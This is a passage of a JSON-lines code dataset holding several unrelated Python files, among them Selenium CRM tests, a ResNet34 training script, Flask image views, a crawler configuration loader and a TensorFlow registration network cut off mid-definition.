vote\")\n#\n# check_voter(\"tom\")\n# check_voter(\"mike\")\n# check_voter(\"mike\")\n\n# the costs table\ninfinity=float(\"inf\")\ncosts={}\ncosts[\"a\"]=6\ncosts[\"b\"]=2\ncosts[\"fin\"]=infinity\nprint(costs)\n\nfor i in costs:\n print(i)\n\nfor j in costs.keys():\n print(j)\n\nfor value in costs.values():\n print(value)","sub_path":"algorithm/list_test.py","file_name":"list_test.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"288579689","text":"import soccersimulator, soccersimulator.settings\nfrom soccersimulator import AbstractStrategy, SoccerAction\nfrom soccersimulator import SoccerTeam, SoccerMatch\nfrom soccersimulator import Vector2D, Player, SoccerTournament\nclass RandomStrategy(AbstractStrategy):\n def __init__(self):\n AbstractStrategy.__init__(self, \"Random\")\n def compute_strategy(self, state, id_team, id_player):\n return SoccerAction(Vector2D.create_random(),\n Vector2D.create_random())\n\nteam1 = SoccerTeam(\"team1\", [Player(\"t1j1\", RandomStrategy())])\nteam2 = SoccerTeam(\"team2\", [Player(\"t2j1\", RandomStrategy())])\nteam3 = SoccerTeam(\"team3\", [Player(\"t3j1\", RandomStrategy())])\nmatch = SoccerMatch(team1, team2)\nsoccersimulator.show(match)\ntournoi = SoccerTournament(1)\ntournoi.add_team(team1)\ntournoi.add_team(team2)\ntournoi.add_team(team3)\nsoccersimulator.show(tournoi)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130949032","text":"import selenium.webdriver.support.ui as ui\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nimport variables\nfrom abstract_test import AbstractTest\n\n\nclass CloudTest(AbstractTest):\n def setUp(self):\n super(CloudTest, self).setUp()\n\n def tearDown(self):\n super(CloudTest, self).tearDown()\n\n def Login(self):\n self.console_green('... : Login ')\n self.driver.get(variables.first_step_base_url)\n try:\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, variables.login_button_css))\n )\n except:\n self.driver.quit()\n\n self.wait_until_find_by_css(variables.login_button_css).click()\n self.wait_until_find_by_id(variables.username_field_id).send_keys(variables.credential_user)\n self.wait_until_find_by_id(variables.password_field_id).send_keys(variables.credential_password)\n self.wait_until_find_by_css(variables.login_credential__button_css).click()\n try:\n assert self.driver.current_url == variables.page_url\n except:\n self.console_green('... : Login Page Error')\n self.driver.quit()\n\n def Create_Lead(self):\n self.console_green('... : Create Lead ')\n self.driver.get(variables.page_url)\n self.wait_until_find_by_id(variables.lead_button_id).click()\n self.wait_until_find_by_id(variables.new_lead_button_id).click()\n self.last_name = self.random_string(7) # lead name\n company_name = self.random_string(7)\n self.wait_until_find_by_id(variables.last_name_field_id).send_keys(self.last_name)\n self.wait_until_find_by_id(variables.company_name_field_id).send_keys(company_name)\n self.wait_until_find_by_css(variables.save_new_lead_button_css).click()\n\n\n def Change_status(self, default_status):\n self.console_green('... : Change status for Lead ')\n self.driver.get(variables.leads_url)\n self.wait_until_find_by_css(variables.settings_button_css).click()\n self.wait_until_find_by_xpath(variables.settings_xpath).click()\n self.wait_until_find_by_xpath(variables.leads_xpath).click()\n self.wait_until_find_by_css(variables.leads_statuses_css).click()\n self.wait_until_find_by_xpath(variables.new_status_edit_button_xpath).click()\n if default_status == '':\n self.new_status = self.random_string(4)\n else:\n self.new_status = default_status\n self.wait_until_find_by_css(variables.name_field_css).clear()\n self.wait_until_find_by_css(variables.name_field_css).send_keys(self.new_status)\n self.wait_until_find_by_css(variables.save_lead_status_button_css).click()\n self.wait_until_find_by_id(variables.lead_button_id).click()\n self.console_green('... : Lead status is %s ' % self.new_status)\n\n def Check_new_status_at_Lead(self):\n self.driver.get(variables.leads_url)\n self.console_green('... : Check new Lead status')\n self.wait_until_find_by_css(variables.lead_serch_input_css).send_keys(self.last_name)\n self.wait_until_find_by_css(variables.lead_with_new_status_css).click()\n if self.wait_until_find_by_css(variables.status_lead_css).text == self.new_status:\n self.console_green('... : Lead status was changed ')\n else:\n self.console_green('... : Lead status NOT changed')\n self.driver.quit()\n\n def test_Delete_lead(self):\n self.driver.get(variables.leads_url)\n wait = ui.WebDriverWait(self.driver, 10)\n self.console_green('... Delete test DATA')\n self.driver.get(variables.leads_url)\n self.wait_until_find_by_css(variables.lead_serch_input_css).clear()\n self.wait_until_find_by_css(variables.select_all_css).click()\n wait.until(lambda driver: self.wait_until_find_by_xpath(variables.more_action_xpath))\n self.wait_until_find_by_xpath(variables.more_action_xpath).click()\n self.wait_until_find_by_css(variables.delete_all_lead_css).click()\n self.wait_until_find_by_css(variables.confim_delete_all_css).click()\n\n # def cloud_steps(self):\n # for name in sorted(dir(self)):\n # if name.startswith(\"cloud_step\"):\n # yield name, getattr(self, name)\n #\n # def test_cloud_steps(self):\n # for name, step in self.cloud_steps():\n # try:\n # step()\n # except Exception as e:\n # self.fail(\"{} failed ({}: {})\".format(step, type(e), e))\n\n\ndef test_create_cluster():\n ct = CloudTest()\n ct.setUp()\n ct.Login()\n ct.Create_Lead()\n ct.Change_status('')\n ct.Check_new_status_at_Lead()\n ct.Change_status('New')\n ct.test_Delete_lead()\n ct.tearDown()\n","sub_path":"test_suit.py","file_name":"test_suit.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"609061312","text":"\"\"\" 순위 검색\n Link: https://programmers.co.kr/learn/courses/30/lessons/72412\n\"\"\"\ndef solution(orders, course):\n answer = []\n os = list(''.join(sorted(o)) for o in orders)\n import itertools, collections\n for l in course:\n counter = collections.Counter(''.join(c) for o in os for c in itertools.combinations(o, l))\n if len(counter) > 0:\n x = max(counter.values())\n for k, v in counter.items():\n if v > 1 and v == x:\n answer.append(k)\n return sorted(answer)\n","sub_path":"2021W05/q/72411.py","file_name":"72411.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"488076485","text":"# ResNet34 - Fixed\n# 2 FC layers\n\nimport time\nimport os\nimport copy\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\n\nfrom .dataset import split_train_val\n\ndataset_sizes = {}\ndataloaders = {}\nimage_datasets = {}\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nuse_gpu = torch.cuda.is_available()\n\ndef train_model(model, criterion, optimizer, scheduler, num_epochs=25):\n since = time.time()\n\n best_model_wts = model.state_dict()\n best_acc = 0.0\n\n FloatTensor = torch.cuda.FloatTensor if use_gpu else torch.FloatTensor\n LongTensor = torch.cuda.LongTensor if use_gpu else torch.LongTensor\n ByteTensor = torch.cuda.ByteTensor if use_gpu else torch.ByteTensor\n Tensor = FloatTensor\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n since_epoch = time.time()\n if phase == 'train':\n scheduler.step()\n model.train(True) # Set model to training mode\n else:\n model.train(False) # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for data in dataloaders[phase]:\n # get the inputs\n inputs, labels = data\n\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n outputs = model(inputs)\n _, preds = torch.max(outputs.data, 1)\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n \n # statistics\n running_loss += loss.data.item()\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / len(image_datasets[phase])\n epoch_acc = running_corrects.type(FloatTensor) / len(image_datasets[phase])\n\n time_elapsed_epoch = time.time() - since_epoch\n print('{} Loss: {:.4f} Acc: {:.4f} in {:.0f}m {:.0f}s'.format(\n phase, epoch_loss, epoch_acc, time_elapsed_epoch // 60, time_elapsed_epoch % 60))\n\n # deep copy the model\n if phase == 'val' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = model.state_dict()\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n\ndef init_data():\n global dataloaders\n global dataset_sizes\n global image_datasets\n global device\n # Data augmentation and normalization for training\n # Just normalization for validation\n train_transform = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n val_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n data_dir = 'train'\n image_datasets['train'], image_datasets['val'] = split_train_val(data_dir, train_transform=train_transform, val_transform=val_transform)\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4,\n shuffle=True, num_workers=4)\n for x in ['train', 'val']}\n dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}\n\n return dataloaders\n\ndef finetune(model):\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 120)\n\n model = model.to(device)\n criterion = nn.CrossEntropyLoss()\n\n # Observe that all parameters are being optimized\n optimizer_ft = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\n # Decay LR by a factor of 0.1 every 7 epochs\n exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)\n\n model = train_model(model, criterion, optimizer_ft, exp_lr_scheduler,\n num_epochs=25)\n return model\n\ndef train_fc(model):\n for param in model.parameters():\n param.requires_grad = False\n\n # Parameters of newly constructed modules have requires_grad=True by default\n num_ftrs = model.fc.in_features\n H1 = 240\n C = 120\n model.fc = nn.Linear(num_ftrs, H1)\n model = nn.Sequential(\n model, \n nn.ReLU(),\n nn.Linear(H1,C)\n )\n\n model = model.to(device)\n criterion = nn.CrossEntropyLoss()\n\n # Observe that only parameters of final layer are being optimized as\n # opposed to before.\n optimizer_conv = optim.SGD(filter( lambda p: p.requires_grad, model.parameters() ), lr=0.001, momentum=0.9)\n\n # Decay LR by a factor of 0.1 every 7 epochs\n exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=7, gamma=0.1)\n\n model = train_model(model, criterion, optimizer_conv,\n exp_lr_scheduler, num_epochs=25)\n\n return model\n\ndef main():\n init_data()\n\n model = models.resnet34(pretrained=True)\n train_fc(model)\n return model\n\nif __name__ == '__main__':\n main()\n","sub_path":"main_res34_2fc_resize.py","file_name":"main_res34_2fc_resize.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"284314725","text":"from flask import Flask, current_app, abort, render_template\nfrom flask.views import MethodView\n\nfrom . import images\nfrom .mixins import ProcessImageMixin\n\napp = Flask(__name__)\nwith app.app_context():\n app = current_app\n\n\ndef image_config() -> dict:\n image_config = app.config.get(\"IMAGE_CONFIG\", {})\n return image_config\n\n\ndef get_thumbnail_size() -> int:\n thumbnail_size = image_config()[\"thumbnail_size\"]\n if not isinstance(thumbnail_size, int):\n raise Exception\n return thumbnail_size\n\n\ndef get_quality_size() -> int:\n thumbnail_size = image_config()[\"quality\"]\n if not isinstance(thumbnail_size, int):\n raise Exception\n return thumbnail_size\n\n\nclass ResizeImageView(ProcessImageMixin, MethodView):\n def get(self, filename, size=0):\n if app.storage.is_exist(filename):\n content = app.storage.read(filename)\n return self.resize(content=content, size=size)\n else:\n return abort(404)\n\n\nclass GrayImageView(ProcessImageMixin, MethodView):\n def get(self, filename):\n if app.storage.is_exist(filename):\n content = app.storage.read(filename)\n return self.to_gray(content=content)\n else:\n return abort(404)\n\n\nclass AsciiArtImageView(ProcessImageMixin, MethodView):\n def get(self, filename):\n if app.storage.is_exist(filename):\n content = app.storage.read(filename)\n return render_template(\"images/aimg.html\", aimg=self.to_asciiart(content))\n else:\n return abort(404)\n\n\nimages.add_url_rule(\n \"//resize/\",\n view_func=ResizeImageView.as_view(\"image-processor-thumbnail\"),\n)\nimages.add_url_rule(\n \"//resize/\",\n view_func=ResizeImageView.as_view(\"image-processor\"),\n)\n\nimages.add_url_rule(\n \"//l/\", view_func=GrayImageView.as_view(\"image-gray\")\n)\n\nimages.add_url_rule(\n \"//ascii/\", view_func=AsciiArtImageView.as_view(\"image-ascii\")\n)\n","sub_path":"apps/views/images/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130126847","text":"# coding: utf-8\n\"\"\"\nLoad the config json file.\n\"\"\"\n\nfrom collections import OrderedDict\nfrom past.builtins import basestring\nimport json\nimport os\nimport re\nimport copy\nimport platform\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nfrom strategies.abstract_strategy import AbstractStrategy\nfrom custom_middleware import CustomMiddleware\nfrom js_executor import JsExecutor\nimport helpers\n\ntry:\n from urlparse import urlparse\n from urllib import unquote_plus\nexcept ImportError:\n from urllib.parse import urlparse, unquote_plus\n\n\nclass ConfigLoader(object):\n \"\"\"\n ConfigLoader\n \"\"\"\n # We define them here so the linters/autocomplete know what to expect\n allowed_domains = None\n api_key = None\n app_id = None\n custom_settings = None\n index_name = None\n index_prefix = None\n selectors = None\n selectors_exclude = []\n start_urls = None\n stop_urls = []\n strategy = None\n strip_chars = u\".,;:§¶\"\n min_indexed_level = 0\n scrap_start_urls = True\n strict_redirect = False\n remove_get_params = False\n login = None\n keep_tags = []\n extra_records = []\n\n\n # data storage, starting here attribute are not config params\n config_file = None\n config_content = None\n config_original_content = None\n\n driver = None\n\n def __init__(self, config, index_prefix=''):\n if os.path.isfile(config):\n self.config_file = config\n with open(self.config_file, 'r') as f:\n config = f.read()\n\n try:\n self.config_original_content = config\n data = json.loads(config, object_pairs_hook=OrderedDict)\n self.config_content = copy.deepcopy(data)\n except ValueError:\n raise ValueError('CONFIG is not a valid JSON')\n\n # Check for all mandatory variables\n data = self.assert_config(data)\n\n # Merge other ENV variables\n data['app_id'] = os.environ['APPLICATION_ID']\n data['api_key'] = os.environ['API_KEY']\n data['index_prefix'] = index_prefix\n\n # Expose all the data as attributes\n data['index_name'] = data['index_prefix'] + data['index_name']\n for key, value in data.items():\n setattr(self, key, value)\n\n AbstractStrategy.keep_tags = self.keep_tags\n\n if self.conf_need_browser():\n self.init()\n\n self.start_urls = self.parse_urls(self.start_urls)\n self.selectors = self.parse_selectors(self.selectors)\n\n self.min_indexed_level = self.get_min_indexed_level_object(self.min_indexed_level)\n\n if self.login is not None:\n self.js_render = True\n self.open_login_url()\n\n if self.conf_need_browser() and not self.js_render:\n self.destroy()\n\n @staticmethod\n def get_min_indexed_level_object(min_indexed_level):\n min_indexed_level_object = min_indexed_level\n if isinstance(min_indexed_level, int):\n min_indexed_level_object = {\n 'default': min_indexed_level_object\n }\n\n return min_indexed_level_object\n\n def conf_need_browser(self):\n group_regex = re.compile(\"\\\\(\\?P<(.+?)>.+?\\\\)\")\n results = re.findall(group_regex, self.config_original_content)\n\n return len(results) > 0 or self.js_render\n\n def init(self):\n # Start firefox if needed\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(1)\n CustomMiddleware.driver = self.driver\n JsExecutor.driver = self.driver\n\n def destroy(self):\n # Start firefox if needed\n if self.driver is not None:\n self.driver.quit()\n self.driver = None\n\n @staticmethod\n def parse_selectors_set(config_selectors):\n selectors_set = {}\n for key in config_selectors:\n if key != 'text':\n selectors_set[key] = config_selectors[key]\n else:\n # Backward compatibility, rename text to content\n key = 'content'\n selectors_set[key] = config_selectors['text']\n\n # Backward compatibility, if it's a string then we put it in an object\n if isinstance(selectors_set[key], basestring):\n selectors_set[key] = {'selector': selectors_set[key]}\n\n # Global\n if 'global' in selectors_set[key]:\n selectors_set[key]['global'] = bool(selectors_set[key]['global'])\n else:\n selectors_set[key]['global'] = False\n\n # Type\n if 'type' in selectors_set[key]:\n if selectors_set[key]['type'] not in ['xpath', 'css']:\n raise Exception(\n selectors_set[key]['type'] + 'is not a good selector type, it should be `xpath` or `css`')\n else:\n selectors_set[key]['type'] = 'css'\n\n if selectors_set[key]['type'] == 'css':\n selectors_set[key]['selector'] = AbstractStrategy.css_to_xpath(selectors_set[key]['selector'])\n\n # We don't need it because everything is xpath now\n selectors_set[key].pop('type')\n\n # Default value\n selectors_set[key]['default_value'] = selectors_set[key]['default_value'] if 'default_value' in selectors_set[\n key] else None\n\n # Strip chars\n selectors_set[key]['strip_chars'] = selectors_set[key]['strip_chars'] if 'strip_chars' in selectors_set[key] else None\n\n return selectors_set\n\n @staticmethod\n def parse_selectors(config_selectors):\n selectors = {}\n\n if 'lvl0' in config_selectors:\n config_selectors = {'default': config_selectors}\n\n for selectors_key in config_selectors:\n selectors[selectors_key] = ConfigLoader.parse_selectors_set(config_selectors[selectors_key])\n\n return selectors\n\n def get_extra_facets(self):\n extra_facets = []\n for start_url in self.start_urls:\n for tag in start_url['url_attributes']:\n extra_facets.append(tag)\n\n extra_facets = set(extra_facets)\n\n return list(extra_facets)\n\n @staticmethod\n def parse_urls(config_start_urls):\n start_urls = []\n for start_url in config_start_urls:\n if isinstance(start_url, basestring):\n start_url = {'url': start_url}\n\n start_url['compiled_url'] = re.compile(start_url['url'])\n\n if \"page_rank\" not in start_url:\n start_url['page_rank'] = 0\n\n if \"tags\" not in start_url:\n start_url['tags'] = []\n\n if \"selectors_key\" not in start_url:\n start_url['selectors_key'] = 'default'\n\n matches = ConfigLoader.get_url_variables_name(start_url['url'])\n\n start_url['url_attributes'] = {}\n for match in matches:\n if len(start_url['url']) > 2 and start_url['url'][-2:] == '?)':\n print('\\033[0;35mWARNING: ' + start_url['url'] + ' finish by a variable.'\n ' The regex probably won\\'t work as expected.'\n ' Add a \\'/\\' or \\'$\\' to make it work properly\\033[0m')\n start_url['url_attributes'][match] = None\n\n # If there is tag(s) we need to generate all possible urls\n if len(matches) > 0:\n values = {}\n for match in matches:\n if 'variables' in start_url:\n if match in start_url['variables']:\n if isinstance(start_url['variables'][match], list):\n values[match] = start_url['variables'][match]\n else:\n if 'url' in start_url['variables'][match] and 'js' in start_url['variables'][match]:\n executor = JsExecutor()\n values[match] = executor.execute(start_url['variables'][match]['url'], start_url['variables'][match]['js'])\n else:\n raise Exception(\"Bad arguments for variables.\" + match + \" for url \" + start_url['url'])\n else:\n raise Exception(\"Missing \" + match + \" in variables\" + \" for url \" + start_url['url'])\n\n start_urls = ConfigLoader.geturls(start_url, matches[0], matches[1:], values, start_urls)\n\n # If there is no tag just keep it like this\n else:\n start_urls.append(start_url)\n return start_urls\n\n def open_login_url(self):\n self.driver.get(unquote_plus(self.login['url']))\n time.sleep(self.login['time'])\n\n @staticmethod\n def get_url_variables_name(url):\n # Cache it to avoid to compile it several time\n if not hasattr(ConfigLoader.get_url_variables_name, 'group_regex'):\n ConfigLoader.get_url_variables_name.group_regex = re.compile(\"\\\\(\\?P<(.+?)>.+?\\\\)\")\n\n return re.findall(ConfigLoader.get_url_variables_name.group_regex, url)\n\n @staticmethod\n def geturls(start_url, current_match, matches, values, start_urls):\n for value in values[current_match]:\n copy_start_url = copy.copy(start_url)\n copy_start_url['original_url'] = copy_start_url['url']\n copy_start_url['url'] = copy_start_url['url'].replace(\"(?P<\"+current_match+\">.*?)\", value)\n copy_start_url['compiled_url'] = re.compile(copy_start_url['url'])\n # Fix weird reference issue\n copy_start_url['url_attributes'] = copy.deepcopy(start_url['url_attributes'])\n copy_start_url['url_attributes'][current_match] = value\n\n if len(matches) == 0:\n start_urls.append(copy_start_url)\n else:\n start_urls = ConfigLoader.geturls(copy_start_url, matches[0], matches[1:], values, start_urls)\n \n return start_urls\n\n @staticmethod\n def assert_config(user_data):\n \"\"\"Check for all needed parameters in config\"\"\"\n\n # Set default values\n default_data = {\n 'start_urls': [],\n 'stop_urls': []\n }\n data = default_data.copy()\n data.update(user_data)\n\n if not data.get('index_name'):\n raise ValueError('index_name is not defined')\n\n # Start_urls is mandatory\n if not data.get('start_urls'):\n raise ValueError('start_urls is not defined')\n\n # Start urls must be an array\n if not isinstance(data.get('start_urls'), list):\n data['start_urls'] = [data['start_urls']]\n\n # Stop urls must be an array\n if not isinstance(data.get('stop_urls'), list):\n data['stop_urls'] = [data['stop_urls']]\n\n # Build default allowed_domains from start_urls and stop_urls\n if not data.get('allowed_domains'):\n if not data.get('allowed_domains'):\n def get_domain(url):\n \"\"\" Return domain name from url \"\"\"\n return urlparse(url).netloc\n\n # Concatenating both list, being careful that they can be None\n all_urls = [_['url'] if not isinstance(_, basestring) else _ for _ in data.get('start_urls', [])] + data.get('stop_urls', [])\n # Getting the list of domains for each of them\n all_domains = [get_domain(_) for _ in all_urls]\n # Removing duplicates\n all_domains_unique = []\n for domain in all_domains:\n if domain in all_domains_unique:\n continue\n all_domains_unique.append(domain)\n\n data['allowed_domains'] = all_domains_unique\n\n # Allowed domains must be an array\n if not isinstance(data.get('allowed_domains'), list):\n data['allowed_domains'] = [data['allowed_domains']]\n\n # Set default strategy\n data['strategy'] = data.get('strategy') or 'default'\n\n # `js_render` is set to False by default unless `true` is specified\n if isinstance(data.get('js_render'), bool):\n data['js_render'] = data.get('js_render')\n else:\n data['js_render'] = False\n\n # `js_wait` is set to 0s by default unless it is specified\n if isinstance(data.get('js_wait'), int):\n data['js_wait'] = data.get('js_wait')\n else:\n data['js_wait'] = 0\n\n # `use_anchors` is set to True by default unless `false` is specified\n if isinstance(data.get('use_anchors'), bool):\n data['use_anchors'] = data.get('use_anchors')\n else:\n data['use_anchors'] = False\n\n return data\n\n def update_nb_hits(self, nb_hits):\n if self.config_file is not None:\n previous_nb_hits = None if 'nb_hits' not in self.config_content else self.config_content['nb_hits']\n\n if previous_nb_hits is None or previous_nb_hits != nb_hits:\n print(\"previous nb_hits: \" + str(previous_nb_hits))\n print(\"\")\n\n if helpers.confirm('Do you want to update the nb_hits in ' + self.config_file + ' ?'):\n try:\n self.config_content['nb_hits'] = nb_hits\n with open(self.config_file, 'w') as f:\n f.write(json.dumps(self.config_content, indent=2, separators=(',', ': ')))\n print(\"\")\n print(\"[OK] \" + self.config_file + \" has been updated\")\n except Exception:\n print(\"\")\n print(\"[KO] \" + \"Was not able to update \" + self.config_file)\n\n def get_extra_records(self):\n return self.extra_records","sub_path":"scraper/src/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":13960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"420016500","text":"from django.core.urlresolvers import resolve\nfrom django.test.testcases import TestCase\nfrom 試驗.書面表.書面試驗表 import 書面試驗表\nfrom 拍字.介面.搜揣 import 看書面的逝\n\n\nclass 介面試驗(TestCase):\n def setUp(self):\n self.書面 = 書面試驗表.新增一筆書面(編號='33', 文章名='333', 作者='33', 類別='S3')\n self.書面.新增資料(\n None,\n 漢字='媠巧靚,\\n豬仔誠古錐,',\n 臺羅='Sui2-khiau2-tsiang5,\\n ti1-a2 tsiann5 koo2-tsui1,'\n )\n\n def test_對應函式(self):\n 對應 = resolve('/搜揣/文章/1/5')\n self.assertEqual(對應.func, 看書面的逝)\n\n def test_有逝數(self):\n 回應 = self.client.get('/搜揣/文章/{}/0'.format(self.書面.id))\n self.assertEqual(\n 回應.json()['逝數'], 2\n )\n\n def test_有漢字(self):\n 回應 = self.client.get('/搜揣/文章/{}/0'.format(self.書面.id))\n self.assertEqual(\n 回應.json()['漢字'], '媠巧靚,'\n )\n\n def test_有臺羅(self):\n 回應 = self.client.get('/搜揣/文章/{}/0'.format(self.書面.id))\n self.assertEqual(\n 回應.json()['臺羅'], 'Sui2-khiau2-tsiang5,'\n )\n\n def test_揣超過(self):\n 回應 = self.client.get('/搜揣/文章/{}/3'.format(self.書面.id))\n self.assertEqual(回應.json(), {'失敗': '攏總 2 句爾'})\n","sub_path":"試驗/搜揣/test介面看試驗.py","file_name":"test介面看試驗.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188378870","text":"import numpy as np\nimport os, time, datetime, sys\nimport tensorflow as tf\nimport shutil\nimport matplotlib.pyplot as plt\nimport Functions.RegNet as RegNet\nimport Functions.RegNetThread as RegNetThread\nimport Functions.PyFunctions as PF\n\n# %%-------------------------------------------h.sokooti@gmail.com--------------------------------------------\n\nmyDate = current_time = datetime.datetime.now()\nLOGDIR = '/home/hsokooti/DL/RegNet/TB/2DB/'\nExp='MICCAI3D_{:04d}{:02d}{:02d}_{:02d}{:02d}'.format(myDate.year, myDate.month, myDate.day, myDate.hour, myDate.minute, myDate.second)\n\n# saving the current script\nif not(os.path.isdir(LOGDIR + 'train' + Exp+'/Model/')):\n os.makedirs(LOGDIR + 'train' + Exp+'/Model/')\n print('folder created')\nshutil.copy(os.path.realpath(__file__),LOGDIR + 'train' + Exp+'/Model/')\nsys.stdout = PF.Logger(LOGDIR + 'train' + Exp+'/Model/log.txt')\n\ndef RegNet_model(learning_rate = 1E-4 , max_steps = 1000):\n tf.reset_default_graph()\n sess = tf.Session()\n\n x = tf.placeholder(tf.float32, shape=[None, 29, 29, 29 , 2], name=\"x\")\n # x = tf.placeholder(tf.float32, shape=[None, None, None, 2], name=\"x\")\n\n xLow = tf.placeholder(tf.float32, shape=[None, 27, 27, 27, 2], name=\"x\")\n\n y = tf.placeholder(tf.float32, shape=[None, 1, 1, 1, 3], name=\"labels\")\n # y = tf.placeholder(tf.float32, shape=[None, None, None, 2], name=\"labels\")\n bn_training = tf.placeholder(tf.bool, name='bn_training')\n mseTrainAverage_net = tf.placeholder(tf.float32 , shape = [] )\n\n\n\n conv1F = tf.layers.conv3d(inputs=x[:,:,:,:,0,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1F')\n conv1F = tf.layers.batch_normalization(conv1F, training=bn_training, name='bn1F', scale=True)\n conv1F = tf.nn.relu(conv1F)\n\n conv1M = tf.layers.conv3d(inputs=x[:,:,:,:,1,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1M')\n conv1M = tf.layers.batch_normalization(conv1M, training=bn_training, name='bn1M', scale=True)\n conv1M = tf.nn.relu(conv1M)\n\n conv1FLow = tf.layers.conv3d(inputs=xLow[:,:,:,:,0,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1FLow')\n conv1FLow = tf.layers.batch_normalization(conv1FLow, training=bn_training, name='bn1FLow', scale=True)\n conv1FLow = tf.nn.relu(conv1FLow)\n\n conv1MLow = tf.layers.conv3d(inputs=xLow[:,:,:,:,1,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1MLow')\n conv1MLow = tf.layers.batch_normalization(conv1MLow, training=bn_training, name='bn1MLow', scale=True)\n conv1MLow = tf.nn.relu(conv1MLow)\n\n for i in range (2,4):\n conv1F = tf.layers.conv3d(conv1F, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'F')\n conv1F = tf.layers.batch_normalization(conv1F, training=bn_training)\n conv1F = tf.nn.relu(conv1F)\n\n for i in range(2, 4):\n conv1M = tf.layers.conv3d(conv1M, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'M')\n conv1M = tf.layers.batch_normalization(conv1M, training=bn_training)\n conv1M = tf.nn.relu(conv1M)\n\n for i in range (2,4):\n conv1FLow = tf.layers.conv3d(conv1FLow, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'FLow')\n conv1FLow = tf.layers.batch_normalization(conv1FLow, training=bn_training)\n conv1FLow = tf.nn.relu(conv1FLow)\n\n for i in range (2,4):\n conv1MLow = tf.layers.conv3d(conv1MLow, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'MLow')\n conv1MLow = tf.layers.batch_normalization(conv1MLow, training=bn_training)\n conv1MLow = tf.nn.relu(conv1MLow)\n\n conv2 = tf.concat([conv1F, conv1M], 4)\n conv2Low = tf.concat([conv1FLow, conv1MLow], 4)\n\n numberOfFeatures = [25,25,25,30,30,30]\n for i in range (4,10):\n conv2Low = tf.layers.conv3d(conv2Low, numberOfFeatures[i-4] , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'Low')\n conv2Low = tf.layers.batch_normalization(conv2Low, training=bn_training)\n conv2Low = tf.nn.relu(conv2Low)\n\n numberOfFeatures = [25,30]\n for i in range(4, 6):\n conv2 = tf.layers.conv3d(conv2, numberOfFeatures[i-4] , 3, padding=\"valid\", activation=None, name='conv'+str(i))\n conv2 = tf.layers.batch_normalization(conv2, training=bn_training)\n conv2 = tf.nn.relu(conv2)\n\n conv2 = tf.layers.max_pooling3d(conv2 , 2, 2, name='conv6')\n\n conv3 = tf.concat([conv2, conv2Low], 4)\n\n numberOfFeatures = [60, 70, 75, 150]\n for i in range(1, 5):\n conv3 = tf.layers.conv3d(conv3, numberOfFeatures[i-1] , 3, padding=\"valid\", activation=None, name='convFullyConnected'+str(i))\n conv3 = 